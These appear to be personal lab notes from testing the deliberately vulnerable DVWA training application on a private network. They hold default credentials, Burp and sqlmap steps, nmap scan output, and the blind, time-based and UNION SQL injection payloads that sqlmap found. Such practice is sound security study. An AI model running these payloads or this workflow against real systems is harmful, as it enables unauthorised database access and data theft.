https://github.com/RandomStorm/DVWA

Default Credentials

Default username = admin

Default password = passwordc

The variables are set to the following by default:

$_DVWA[ 'db_user' ] = 'root';
$_DVWA[ 'db_password' ] = 'p@ssw0rd';
$_DVWA[ 'db_database' ] = 'dvwa';

=================
[Lab #1 - Steps]
=================

- Open Burp Suite
- Proxy -> Intercept On
- Right Click -> Copy URL -> http://192.168.50.140/vulnerabilities/sqli_blind/?id=222&Submit=Submit
- Copy Cookie Information -> PHPSESSID=t9mo7ukg5m6lgit1e61rk0vqc7
- Fordward  :: (optional) - If you want to load the page.
- Open Sqlmap.
- sqlmap -u "http://192.168.50.140/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=high; PHPSESSID=t9mo7ukg5m6lgit1e61rk0vqc7"  

===================
 BURP SUITE RESULT
===================

GET /vulnerabilities/sqli_blind/?id=222&Submit=Submit HTTP/1.1
Host: 192.168.50.140
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.50.140/vulnerabilities/sqli_blind/?id=%27&Submit=Submit
Cookie: PHPSESSID=t9mo7ukg5m6lgit1e61rk0vqc7; security=high
Connection: keep-alive

=========
  NMAP
=========

- nmap -sV -A --open 192.168.50.140 -oX dvwa.xml

Starting Nmap 7.01 ( https://nmap.org ) at 2016-06-01 01:21 UTC
Nmap scan report for 192.168.50.140
Host is up (0.00029s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      ProFTPD 1.3.2c
22/tcp   open  ssh      OpenSSH 5.3p1 Debian 3ubuntu4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 2.2.14 ((Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1)
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
| http-title: Damn Vulnerable Web App (DVWA) - Login
|_Requested resource was login.php
443/tcp  open  ssl/http Apache httpd 2.2.14 ((Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1)
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
| http-title: Damn Vulnerable Web App (DVWA) - Login
|_Requested resource was login.php
| ssl-cert: Subject: commonName=localhost/organizationName=Apache Friends/stateOrProvinceName=Berlin/countryName=DE
| Not valid before: 2004-10-01T09:10:30
|_Not valid after:  2010-09-30T09:10:30
|_ssl-date: 2016-06-01T16:15:13+00:00; +14h53m01s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_IDEA_128_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 08:00:27:91:A8:72 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.17 - 2.6.36
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.29 ms 192.168.50.140

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.98 seconds


-------
 INFO
-------

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 6512=6512 AND 'NFrj'='NFrj&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))QCov) AND 'Exge'='Exge&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x7176787671,0x6a54617344656a6f48496f47427842464a47474343505a6976686f6858694c4e794e4b7550656356,0x71706b7671),NULL-- -&Submit=Submit

- web application technology: PHP 5.3.1, Apache 2.2.14
- back-end DBMS: MySQL 5.0.12

===============
 SQL INJECTION 
===============

- 192.168.50.140/vulnerabilities/view_help.php?id='

Notice: Undefined index: security in /opt/lampp/htdocs/vulnerabilities/view_help.php on line 12

Warning: file_get_contents(../vulnerabilities/'/help/help.php) [function.file-get-contents]: failed to open stream: No such file or directory in /opt/lampp/htdocs/vulnerabilities/view_help.php on line 14